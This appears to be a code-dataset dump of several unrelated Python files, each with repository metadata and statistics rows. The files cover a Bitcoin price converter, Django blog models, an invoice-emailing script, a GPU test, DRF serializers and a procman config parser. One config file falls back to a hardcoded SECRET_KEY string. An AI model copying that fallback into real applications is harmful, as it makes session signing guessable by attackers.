use_decimal = self._force_decimal
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = coins*price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_btc_to_cur_on requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given Date")
def get_symbol(self):
"""
Here is Unicode symbol for bitcoin
"""
return "\u0E3F"
_Btc_Converter = BtcConverter()
get_btc_symbol = _Btc_Converter.get_symbol
convert_btc_to_cur_on = _Btc_Converter.convert_btc_to_cur_on
convert_to_btc_on = _Btc_Converter.convert_to_btc_on
convert_btc_to_cur = _Btc_Converter.convert_btc_to_cur
convert_to_btc = _Btc_Converter.convert_to_btc
get_latest_price = _Btc_Converter.get_latest_price
get_previous_price = _Btc_Converter.get_previous_price
get_previous_price_list = _Btc_Converter.get_previous_price_list
| 37.542289 | 145 | 0.579777 | 844 | 7,546 | 4.979858 | 0.126777 | 0.035689 | 0.034261 | 0.020937 | 0.715679 | 0.66976 | 0.656912 | 0.656912 | 0.640733 | 0.622888 | 0 | 0.00607 | 0.323218 | 7,546 | 200 | 146 | 37.73 | 0.816918 | 0.051948 | 0 | 0.666667 | 0 | 0 | 0.168392 | 0.019126 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.025641 | 0 | 0.179487 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cd509e695712b4d2634df653709f63565e266c1 | 1,895 | py | Python | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from baseapp.models import Recently
# Create your models here.
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager, self).get_queryset().filter(status='published')
class Post(Recently):
STATUS_CHOICE = (
('draft', 'Draft'),
('published', 'Published'),
)
title = models.CharField(max_length=150)
slug = models.SlugField(max_length=150, unique_for_date='publish')
author = models.ForeignKey(User, related_name='blog_posts')
body = models.TextField()
publish = models.DateTimeField(default=timezone.now)
status = models.CharField(max_length=10, choices=STATUS_CHOICE, default='draft')
image = models.ImageField(upload_to='post/%Y/%m/%d', blank=True)
image_description = models.CharField(max_length=60)
objects = models.Manager() # The default manager.
published = PublishedManager() # The Dahl-specific manager.
class Meta:
ordering = ('-publish',)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:post_detail', args=[self.publish.year,
self.publish.strftime('%m'),
self.publish.strftime('%d'),
self.slug,
])
class Comment(Recently):
mail = models.EmailField()
pseudo = models.CharField(max_length=30)
body = models.TextField()
post = models.ForeignKey('Post',
on_delete=models.CASCADE,
blank=False,
related_name='comments')
def __str__(self):
return 'Commented by {} in {}'.format(self.pseudo, self.post)
| 35.092593 | 86 | 0.626913 | 206 | 1,895 | 5.631068 | 0.461165 | 0.038793 | 0.062069 | 0.082759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008541 | 0.258575 | 1,895 | 53 | 87 | 35.754717 | 0.817082 | 0.037995 | 0 | 0.093023 | 0 | 0 | 0.073117 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.116279 | 0.093023 | 0.744186 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6cda2551861539e7955fba8e1b052ccf729d24d4 | 3,171 | py | Python | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | import code.PdfReader as PdfReaderModule
import code.ExcelReader as ExcelReader
import code.TemplateParser as TemplateParser
import code.PdfAnalyzer as PdfAnalyzer
import code.EmailSender as EmailSender
def getFileContent(fileName):
read_data = ""
with open(fileName, encoding="utf-8") as f:
read_data = f.read()
return read_data
def main():
# TODO Do not forget, to remind user, that [MONTH] should be updated before continueing!
print("If you use [MONTH] in you template, don't forget to update it in InvoiceSenderControl.xlsx")
input("Press Enter to continue... (close window with script to CANCEL)")
print("Parsing excel...")
excelReader = ExcelReader.ExcelReader()
excelContent = excelReader.getData()
excelSmtpData = excelReader.getSmtpData()
print("Parsing pdf...")
pdfReader = PdfReaderModule.PdfReader()
pdfFileNameToItsContentMap = pdfReader.getReadedInvoicesMap()
print("Searching pdfs...")
pdfAnalyzer = PdfAnalyzer.PdfAnalyzer(pdfFileNameToItsContentMap)
emailContentAttachmentList = []
for (invoiceText, emailAddress, templateName, keyWordMap, emailSubject, messageId) in excelContent:
invoicesToAttach = pdfAnalyzer.searchSentenceAndUpdateStats(invoiceText)
if len(invoicesToAttach) == 0:
print("No invoices for: " + emailAddress + " SKIPPING!")
continue
templateContent = getFileContent("emailTemplates/" + templateName)
if templateContent is None or templateContent == "":
print("template not existing or empty for: " + emailAddress + " SKIPPING!")
continue
templateParser = TemplateParser.TemplateParser(templateContent, keyWordMap)
emailFilledTemplate = templateParser.getFilledTemplate()
emailContentAttachmentList.append( (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) )
print("What will be sent:")
for (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) in emailContentAttachmentList:
print("To " + emailAddress + " will be send " + str(invoicesToAttach))
print("Checking if all PDFs can be delivered:")
pdfAnalyzer.dropStatistics()
input("Press Enter to send emails.. (close window with script to CANCEL)")
print("Sending emails...")
(smtpAddress, smtpPort, ownerEmail, ownerPassword) = excelSmtpData
emailSender = EmailSender.EmailSender(smtpAddress, smtpPort, ownerEmail, ownerPassword)
for (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) in emailContentAttachmentList:
if messageId == None or messageId == "":
emailSender.sendEmail(emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach)
print("Sent an email to " + emailAddress + " with " + str(invoicesToAttach))
else:
emailSender.replayEmail(emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId)
print("Sent response to " + emailAddress + " with " + str(invoicesToAttach))
emailSender.close()
if __name__ == '__main__':
main()
| 45.3 | 123 | 0.71397 | 285 | 3,171 | 7.905263 | 0.403509 | 0.022193 | 0.095428 | 0.130937 | 0.215712 | 0.182867 | 0.118065 | 0.087883 | 0 | 0 | 0 | 0.000785 | 0.196468 | 3,171 | 69 | 124 | 45.956522 | 0.883438 | 0.027121 | 0 | 0.074074 | 0 | 0.018519 | 0.162828 | 0.008109 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.037037 | false | 0.037037 | 0.092593 | 0 | 0.148148 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ce5b1fdedad3f99e65e3d1f3574b7a7cc248760 | 715 | py | Python | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 8 | 2019-03-20T02:54:03.000Z | 2021-08-24T15:26:21.000Z | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 32 | 2019-03-19T23:34:20.000Z | 2022-03-22T19:10:28.000Z | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 4 | 2019-03-22T18:14:00.000Z | 2021-12-08T14:49:33.000Z | results = open('test-results-gpu.out', 'a')
results.write('** Starting serial GPU tests **\n')
try:
# Fresnel
#import fresnel
#results.write('Fresnel version : {}\n'.format(fresnel.__version__))
#dev = fresnel.Device(mode='gpu', n=1)
#results.write('Fresnel device : {}\n'.format(dev))
# HOOMD
import hoomd
context = hoomd.context.initialize('--mode=gpu')
assert(context.on_gpu())
results.write('HOOMD version : {}\n'.format(hoomd.__version__))
results.write('HOOMD flags : {}\n'.format(hoomd._hoomd.hoomd_compile_flags()))
results.write('** Serial GPU tests PASSED **\n\n')
except:
results.write('** Serial GPU tests FAILED **\n\n')
raise
| 31.086957 | 88 | 0.634965 | 90 | 715 | 4.911111 | 0.344444 | 0.190045 | 0.095023 | 0.095023 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001715 | 0.184615 | 715 | 22 | 89 | 32.5 | 0.756432 | 0.26014 | 0 | 0 | 0 | 0 | 0.341651 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0 | false | 0.083333 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6ce92f7cc60e57aeb3a0f765328c9efb31ca244a | 626 | py | Python | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | import os
import urllib.parse
basedir = os.path.abspath(os.path.dirname(__file__))
if "DB_CONNECTIONSTRING" in os.environ:
params = urllib.parse.quote_plus(os.environ.get("DB_CONNECTIONSTRING"))
class Config(object):
SECRET_KEY = os.environ.get("SECRET_KEY") or "iR33OXoRSUj5"
SQLALCHEMY_DATABASE_URI = "mssql+pyodbc:///?odbc_connect={}".format(params)
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
VERSION = "2.1.0"
WTF_CSR_ENABLED = True
CACHE_TYPE = "simple"
CACHE_DEFAULT_TIMEOUT = 50
MAINTITLE = "Sonats Lockdown Workout "
INSTANCE = "SONAT"
| 28.454545 | 79 | 0.728435 | 80 | 626 | 5.425 | 0.7375 | 0.062212 | 0.0553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015209 | 0.159744 | 626 | 21 | 80 | 29.809524 | 0.809886 | 0 | 0 | 0 | 0 | 0 | 0.210863 | 0.051118 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.8125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ceec6d6259423de30eaf0244fd138f63c906931 | 4,710 | py | Python | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | 2 | 2017-07-11T12:40:59.000Z | 2017-10-18T18:02:46.000Z | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | 12 | 2017-06-19T07:20:41.000Z | 2022-03-15T19:03:33.000Z | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | null | null | null | from django.utils.formats import localize
from rest_framework.serializers import (
ModelSerializer,
HyperlinkedIdentityField,
SerializerMethodField,
ValidationError,
)
from rest_framework import serializers
from django.contrib.auth import get_user_model
from ...purchase.models import PurchaseProduct as Table
from saleor.payment.models import PaymentOption
from structlog import get_logger
logger = get_logger(__name__)
User = get_user_model()
class TableListSerializer(serializers.ModelSerializer):
unit_cost = SerializerMethodField()
total_cost = SerializerMethodField()
paid = SerializerMethodField()
supplier_name = SerializerMethodField()
product_name = SerializerMethodField()
pay_option = SerializerMethodField()
date = SerializerMethodField()
credit_balance = SerializerMethodField()
class Meta:
model = Table
fields = (
'id',
'invoice_number',
'product_name',
'variant',
'quantity',
'unit_cost',
'total_cost',
'paid',
'credit_balance',
'supplier_name',
'pay_option',
'date',
)
def get_pay_option(self, obj):
try:
options = obj.payment_options.first().name
except Exception as e:
print(e)
options = ''
try:
return options + '<br> ' + obj.payment_number
except:
return ''
def get_credit_balance(self, obj):
try:
return "{:,}".format(obj.balance.gross)
except Exception as e:
print(e)
return ''
def get_paid(self, obj):
try:
return "{:,}".format(obj.amount_paid.gross)
except Exception as e:
print(e)
return ''
def get_product_name(self, obj):
try:
return obj.stock.variant.display_product()
except:
return ''
def get_supplier_name(self, obj):
try:
return obj.supplier.name
except:
return ''
def get_date(self, obj):
return localize(obj.created)
def get_unit_cost(self, obj):
try:
return obj.cost_price.gross
except Exception as e:
return 0
def get_total_cost(self, obj):
try:
return obj.total_cost.gross
except Exception as e:
return 0
class DistinctTableListSerializer(serializers.ModelSerializer):
purchase_url = HyperlinkedIdentityField(view_name='dashboard:sale_supplier_list')
unit_cost = SerializerMethodField()
total_cost = SerializerMethodField()
total_quantity = SerializerMethodField()
supplier_name = SerializerMethodField()
product_name = SerializerMethodField()
date = SerializerMethodField()
class Meta:
model = Table
fields = (
'id',
'invoice_number',
'product_name',
'variant',
'quantity',
'unit_cost',
'total_cost',
'total_quantity',
'supplier_name',
'date',
'purchase_url'
)
def get_product_name(self, obj):
return obj.stock.variant.display_product()
def get_date(self, obj):
return localize(obj.created)
def get_supplier_name(self, obj):
try:
return obj.supplier.name
except:
return ''
def get_unit_cost(self, obj):
try:
return obj.cost_price.gross
except Exception as e:
return 0
def get_total_quantity(self, obj):
try:
return Table.objects.total_quantity(obj)
except:
return 0
def get_total_cost(self, obj):
try:
return Table.objects.total_cost(obj)
except:
return 0
class PaymentOptionListSerializer(serializers.ModelSerializer):
tendered = SerializerMethodField()
transaction_number = SerializerMethodField()
payment_name = SerializerMethodField()
class Meta:
model = PaymentOption
fields = (
'id',
'name',
'transaction_number',
'payment_name',
'tendered'
)
def get_transaction_number(self, obj):
return ''
def get_tendered(self, obj):
return 0.00
def get_payment_name(self, obj):
try:
return obj.name
except:
return ''
| 25.597826 | 85 | 0.562208 | 432 | 4,710 | 5.93287 | 0.185185 | 0.039797 | 0.04682 | 0.06867 | 0.508389 | 0.508389 | 0.378463 | 0.28014 | 0.28014 | 0.28014 | 0 | 0.002642 | 0.357113 | 4,710 | 183 | 86 | 25.737705 | 0.843791 | 0 | 0 | 0.638158 | 0 | 0 | 0.063057 | 0.005945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111842 | false | 0 | 0.046053 | 0.032895 | 0.506579 | 0.019737 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6cf5c425b9a007093ff73fa1c5872a082b863b03 | 18,872 | py | Python | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | TokIdentifier = "Identifier"
TokOpenStruct = "OpenStruct"
TokCloseStruct = "CloseStruct"
TokAssign = "Assign"
TokEndStatement = "EndStatement"
TokString = "String"
TokEOF = "EOF"
TokComment = "Comment"
TokInteger = "Integer"
class Token(object):
def __init__ (self, type, val):
self.type = type
self.val = val
class ParseError (ValueError):
def __init__ (self, lineno, line_pos, line_text, tokenval, msg):
self.lineno = lineno
self.offset = line_pos
self.text = line_text
self.token = tokenval
self.msg = msg
def __str__ (self):
ntabs = self.text.count ("\t")
tokenstr = ""
if self.token is not None:
tokenstr = "token %s" % self.token
s = """%s
line %d col %s %s
%s
""" % (self.msg, self.lineno, self.offset, tokenstr, self.text)
s += " " * (self.offset - ntabs - 1) + "\t" * ntabs + "^"
return s
class Tokenizer(object):
def __init__ (self, f):
self.f = f
self.unget_char = None
self.line_pos = 0
self.line_len = 0
self.line_buf = ""
self.line_num = 1
self.tok_pos = 0
self.prev_tok_pos = 0
def _next_char (self):
if self.unget_char is not None:
c = self.unget_char
self.unget_char = None
return c
else:
if self.line_pos == self.line_len:
self.line_buf = self.f.readline ()
if not len (self.line_buf):
return ''
self.line_len = len (self.line_buf)
self.line_pos = 0
c = self.line_buf[self.line_pos]
self.line_pos += 1
if c == '\n':
self.line_num += 1
return c
def _ungetc (self, c):
if not c: return
self.unget_char = c
def _unescape (self, c):
d = { "n": "\n",
"r": "\r",
"t": "\t" }
if c in d: return d[c]
return c
def next_token (self):
c = self._next_char ()
while c and c.isspace ():
c = self._next_char ()
if not c: return Token (TokEOF, "")
self.prev_tok_pos = self.tok_pos
self.tok_pos = self.line_pos
simple_tokens = { \
"=" : TokAssign,
";" : TokEndStatement,
"{" : TokOpenStruct,
"}" : TokCloseStruct
}
if c in simple_tokens:
return Token (simple_tokens[c], c)
tok_chars = [ c ]
if c == "#":
while True:
c = self._next_char ()
if not c or c == "\n":
return Token (TokComment, "".join (tok_chars))
tok_chars.append (c)
if c == "\"":
tok_chars = []
while True:
c = self._next_char ()
if c == "\n":
raise ParseError (self.line_num, self.tok_pos,
self.line_buf, None, "Unterminated string constant")
if c == "\\": c = self._unescape (self._next_char ())
elif not c or c == "\"":
return Token (TokString, "".join (tok_chars))
tok_chars.append (c)
if c.isalpha () or c == "_":
while True:
c = self._next_char ()
if not c.isalnum () and c not in "_-":
self._ungetc (c)
return Token (TokIdentifier, "".join (tok_chars))
tok_chars.append (c)
if c.isdigit():
while True:
c = self._next_char()
if not c.isdigit():
self._ungetc(c)
return Token(TokInteger, "".join(tok_chars))
tok_chars.append(c)
raise ParseError (self.line_num, self.line_pos,
self.line_buf, None, "Invalid character")
def escape_str(text):
def escape_char(c):
if c in r'\"':
return '\\' + c
return c
return "".join([ escape_char(c) for c in text ])
class CommandNode(object):
def __init__ (self):
self.attributes = { \
"exec" : None,
"host" : None,
"group" : "",
"nickname" : "",
"stop_signal" : 0,
"stop_time_allowed" : 0
}
def to_config_string(self, indent = 0):
s = " " * indent
lines = []
nickname = self.attributes["nickname"]
if len(nickname):
lines.append (s + "cmd \"%s\" {" % escape_str(nickname))
else:
lines.append (s + "cmd {")
pairs = self.attributes.items()
pairs.sort()
for key, val in pairs:
if not val:
continue
if key in [ "group", "nickname" ]:
continue
lines.append (s + " %s = \"%s\";" % (key, escape_str(val)))
lines.append (s + "}")
return ("\n".join (lines))
def __str__ (self):
return self.to_config_string()
class GroupNode(object):
def __init__ (self, name):
self.name = name
self.commands = []
self.subgroups = {}
def add_command (self, command):
command.attributes["group"] = self.name
self.commands.append (command)
def get_subgroup(self, name_parts, create=False):
if not name_parts:
return self
next_name = name_parts[0]
if next_name in self.subgroups:
return self.subgroups[next_name].get_subgroup(name_parts[1:], create)
elif create:
subgroup = GroupNode(next_name)
self.subgroups[next_name] = subgroup
return subgroup.get_subgroup(name_parts[1:], create)
else:
raise KeyError()
def to_config_string(self, indent=0):
s = " " * indent
if self.name == "":
assert indent == 0
val = "\n".join([group.to_config_string(0) for group in self.subgroups.values()])
val = val + "\n".join([cmd.to_config_string(0) for cmd in self.commands]) + "\n"
else:
val = "%sgroup \"%s\" {\n" % (s, self.name)
val = val + "\n".join([group.to_config_string(indent+1) for group in self.subgroups.values()])
val = val + "\n".join([cmd.to_config_string(indent+1) for cmd in self.commands])
val = val + "\n%s}\n" % s
return val
def __str__ (self):
return self.to_config_string(0)
class StartStopRestartActionNode(object):
def __init__(self, action_type, ident_type, ident, wait_status):
assert action_type in ["start", "stop", "restart"]
assert ident_type in [ "everything", "group", "cmd" ]
self.action_type = action_type
self.ident_type = ident_type
self.wait_status = wait_status
assert wait_status in [None, "running", "stopped"]
if self.ident_type == "everything":
self.ident = None
else:
self.ident = ident
assert self.ident is not None
def __str__(self):
if self.ident_type == "everything":
ident_str = self.ident_type
else:
ident_str = "%s \"%s\"" % (self.ident_type, escape_str(self.ident))
if self.wait_status is not None:
return "%s %s wait \"%s\";" % (self.action_type,
ident_str, self.wait_status)
else:
return "%s %s;" % (self.action_type, ident_str)
class WaitMsActionNode(object):
def __init__(self, delay_ms):
self.delay_ms = delay_ms
self.action_type = "wait_ms"
def __str__(self):
return "wait ms %d;" % self.delay_ms
class WaitStatusActionNode(object):
def __init__(self, ident_type, ident, wait_status):
self.ident_type = ident_type
self.ident = ident
self.wait_status = wait_status
self.action_type = "wait_status"
assert wait_status in ["running", "stopped"]
def __str__(self):
return "wait %s \"%s\" status \"%s\";" % \
(self.ident_type, escape_str(self.ident), self.wait_status)
class RunScriptActionNode(object):
def __init__(self, script_name):
self.script_name = script_name
self.action_type = "run_script"
def __str__(self):
return "run_script \"%s\";" % escape_str(self.script_name)
class ScriptNode(object):
def __init__(self, name):
self.name = name
self.actions = []
def add_action(self, action):
assert action is not None
assert hasattr(action, "action_type")
self.actions.append(action)
def __str__(self):
val = "script \"%s\" {" % escape_str(self.name)
for action in self.actions:
val = val + "\n " + str(action)
val = val + "\n}\n"
return val
class ConfigNode(object):
def __init__ (self):
self.scripts = {}
self.root_group = GroupNode("")
def _normalize_group_name(self, name):
if not name.startswith("/"):
name = "/" + name
while name.find("//") >= 0:
name = name.replace("//", "/")
return name.rstrip("/")
def has_group(self, group_name):
name = self._normalize_group_name(group_name)
parts = group_name.split("/")
group = self.root_group
assert group.name == parts[0]
for part in parts:
if part in group.subgroups:
group = group.subgroups[part]
else:
return False
return True
def get_group (self, group_name, create=False):
name = self._normalize_group_name(group_name)
parts = name.split("/")
group = self.root_group
return group.get_subgroup(parts[1:], create)
def add_script (self, script):
assert script.name not in self.scripts
self.scripts[script.name] = script
def __str__ (self):
val = self.root_group.to_config_string()
scripts = sorted(self.scripts.values(), key=lambda s: s.name.lower())
val += "\n" + "\n".join([str(script) for script in scripts])
return val
class Parser:
def __init__ (self):
self.tokenizer = None
self._cur_tok = None
self._next_tok = None
def _get_token (self):
self._cur_tok = self._next_tok
self._next_tok = self.tokenizer.next_token ()
while self._next_tok.type == TokComment:
self._next_tok = self.tokenizer.next_token ()
return self._cur_tok
def _eat_token (self, tok_type):
if self._next_tok and self._next_tok.type == tok_type:
self._get_token ()
return True
return False
def _fail (self, msg):
raise ParseError (self.tokenizer.line_num,
self.tokenizer.prev_tok_pos,
self.tokenizer.line_buf,
self._cur_tok.val, msg)
def _fail_next_token (self, msg):
raise ParseError (self.tokenizer.line_num,
self.tokenizer.tok_pos,
self.tokenizer.line_buf,
self._next_tok.val, msg)
def _eat_token_or_fail(self, tok_type, err_msg):
if not self._eat_token(tok_type):
self._fail_next_token(err_msg)
return self._cur_tok.val
def _expect_identifier(self, identifier, err_msg = None):
if err_msg is None:
err_msg = "Expected %s" % identifier
self._eat_token_or_fail(TokIdentifier, err_msg)
if self._cur_tok.val != identifier:
self._fail(err_msg)
def _parse_identifier_one_of(self, valid_identifiers):
err_msg = "Expected one of %s" % str(valid_identifiers)
self._eat_token_or_fail(TokIdentifier, err_msg)
result = self._cur_tok.val
if result not in valid_identifiers:
self._fail(err_msg)
return result
def _parse_string_one_of(self, valid_strings):
err_msg = "Expected one of %s" % str(valid_strings)
self._eat_token_or_fail(TokString, err_msg)
result = self._cur_tok.val
if result not in valid_strings:
self._fail(err_msg)
return result
def _parse_string_or_fail(self):
self._eat_token_or_fail(TokString, "Expected string literal")
return self._cur_tok.val
def _parse_command_param_list (self, cmd):
if not self._eat_token (TokIdentifier):
return
attrib_name = self._cur_tok.val
attribs = { "exec" : TokString,
"host" : TokString,
"auto_respawn" : TokString,
"group" : TokString,
"stop_signal" : TokInteger,
"stop_time_allowed" : TokInteger }
if attrib_name not in attribs:
self._fail("Unrecognized attribute %s" % attrib_name)
self._eat_token_or_fail(TokAssign, "Expected '='")
if attribs[attrib_name] == TokString:
attrib_val = self._parse_string_or_fail()
else:
self._eat_token_or_fail(TokInteger, "Expected integer literal")
attrib_val = int(self._cur_tok.val)
self._eat_token_or_fail(TokEndStatement, "Expected ';'")
if attrib_name == "stop_signal" and attrib_val < 1:
self._fail("Invalid value specified for command attribute 'stop_signal'")
elif attrib_name == "stop_time_allowed" and attrib_val < 1:
self._fail("Invalid value specified for command attribute 'stop_time_allwoed'")
cmd.attributes[attrib_name] = attrib_val
return self._parse_command_param_list (cmd)
def _parse_command (self):
cmd = CommandNode ()
if self._eat_token(TokString):
cmd.attributes["nickname"] = self._cur_tok.val
if "/" in self._cur_tok.val:
self._fail("'/' character not allowed in command name")
self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
self._parse_command_param_list (cmd)
self._eat_token_or_fail (TokCloseStruct, "Expected '}'")
if not cmd.attributes["exec"]:
self._fail ("Invalid command defined -- no executable specified")
return cmd
def _parse_group(self, parent_group):
self._eat_token_or_fail (TokString, "Expected group name string")
if "/" in self._cur_tok.val:
self._fail("'/' character is not allowed in group name")
elif not self._cur_tok.val.strip():
self._fail("Empty group name is not allowed")
name = self._cur_tok.val
group = parent_group.get_subgroup([name], True)
self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
while self._eat_token(TokIdentifier):
if self._cur_tok.val == "cmd":
group.add_command(self._parse_command())
elif self._cur_tok.val == "group":
self._parse_group(group)
else:
self._fail("Expected one of [group, cmd]")
self._eat_token_or_fail(TokCloseStruct, "Expected '}'")
def _parse_start_stop_restart_action(self, action_type):
valid_ident_types = [ "everything", "cmd", "group" ]
ident_type = self._parse_identifier_one_of(valid_ident_types)
ident = None
if ident_type != "everything":
ident = self._parse_string_or_fail()
if self._eat_token(TokEndStatement):
return StartStopRestartActionNode(action_type, ident_type, ident,
None)
self._expect_identifier("wait", "Expected ';' or 'wait'")
wait_status = self._parse_string_one_of(["running", "stopped"])
self._eat_token_or_fail(TokEndStatement, "Expected ';'")
return StartStopRestartActionNode(action_type, ident_type, ident,
wait_status)
def _parse_wait_action(self):
wait_type = self._parse_identifier_one_of(["ms", "cmd", "group"])
if wait_type == "ms":
err_msg = "Expected integer constant"
delay_ms = int(self._eat_token_or_fail(TokInteger, err_msg))
self._eat_token_or_fail(TokEndStatement, "Expected ';'")
return WaitMsActionNode(delay_ms)
else:
ident = self._parse_string_or_fail()
self._expect_identifier("status")
wait_status = self._parse_string_one_of(["running", "stopped"])
self._eat_token_or_fail(TokEndStatement, "Expected ';'")
return WaitStatusActionNode(wait_type, ident, wait_status)
def _parse_run_script(self):
script_name = self._eat_token_or_fail(TokString, "expected script name")
self._eat_token_or_fail(TokEndStatement, "Expected ';'")
return RunScriptActionNode(script_name)
def _parse_script_action_list(self):
self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
actions = []
while self._eat_token(TokIdentifier):
action_type = self._cur_tok.val
if action_type in [ "start", "stop", "restart" ]:
action = self._parse_start_stop_restart_action(action_type)
actions.append(action)
elif action_type == "wait":
actions.append(self._parse_wait_action())
elif action_type == "run_script":
actions.append(self._parse_run_script())
else:
self._fail("Unexpected token %s" % action_type)
self._eat_token_or_fail(TokCloseStruct, "Unexpected token")
return actions
def _parse_script(self):
name = self._eat_token_or_fail(TokString, "expected script name")
script_node = ScriptNode(name)
for action in self._parse_script_action_list():
script_node.add_action(action)
self._node.add_script(script_node)
def _parse_listdecl(self):
while True:
if self._eat_token(TokEOF):
return
ident_type = self._parse_identifier_one_of(["cmd", "group", "script"])
if ident_type == "cmd":
self._node.root_group.add_command(self._parse_command())
if ident_type == "group":
self._parse_group(self._node.root_group)
if ident_type == "script":
self._parse_script()
def parse (self, f):
self.tokenizer = Tokenizer (f)
self._cur_tok = None
self._next_tok = None
self._get_token ()
self._node = ConfigNode()
